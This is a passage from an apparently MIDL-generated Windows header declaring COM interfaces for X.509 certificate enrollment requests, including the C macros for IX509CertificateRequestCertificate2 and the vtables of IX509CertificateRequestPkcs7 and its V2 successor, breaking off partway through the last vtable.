#define IX509CertificateRequestCertificate2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCertificate2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCertificate2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCertificate2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCertificate2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCertificate2_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate2_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate2_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCertificate2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCertificate2_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestCertificate2_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestCertificate2_CheckPublicKeySignature(This,pPublicKey)	\
    ( (This)->lpVtbl -> CheckPublicKeySignature(This,pPublicKey) ) 

#define IX509CertificateRequestCertificate2_get_Issuer(This,ppValue)	\
    ( (This)->lpVtbl -> get_Issuer(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_Issuer(This,pValue)	\
    ( (This)->lpVtbl -> put_Issuer(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_NotBefore(This,pValue)	\
    ( (This)->lpVtbl -> get_NotBefore(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_NotBefore(This,Value)	\
    ( (This)->lpVtbl -> put_NotBefore(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_NotAfter(This,pValue)	\
    ( (This)->lpVtbl -> get_NotAfter(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_NotAfter(This,Value)	\
    ( (This)->lpVtbl -> put_NotAfter(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_SerialNumber(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SerialNumber(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_put_SerialNumber(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SerialNumber(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate2_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCertificate2_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestCertificate2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCertificate2_InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCertificate2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestCertificate2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCertificate2_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs7_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs7 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs7;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab344-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs7 : public IX509CertificateRequest
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplateName( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions = InheritDefault) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromInnerRequest( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_RequesterName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_RequesterName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_SignerCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs7Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs7 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs7 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs7Vtbl;

    interface IX509CertificateRequestPkcs7
    {
        CONST_VTBL struct IX509CertificateRequestPkcs7Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs7_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs7_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs7_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs7_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs7_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs7_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs7_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs7_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs7_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs7_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs7_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs7_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs7_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs7_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs7_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs7_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs7_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs7_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs7_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestPkcs7_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs7_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestPkcs7_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestPkcs7_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestPkcs7_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs7_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7V2_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs7V2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs7V2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs7V2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35c-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs7V2 : public IX509CertificateRequestPkcs7
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckCertificateSignature( 
            /* [in] */ VARIANT_BOOL ValidateCertificateChain) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs7V2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
